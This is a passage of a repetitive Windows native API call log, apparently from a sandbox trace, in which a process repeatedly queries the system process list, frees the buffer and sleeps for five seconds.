BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.047] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.063] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.081] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.095] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.113] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.126] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.142] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.159] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.173] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.187] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.206] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.219] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.235] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.263] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.282] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.299] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.313] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.328] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.343] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.359] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.375] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 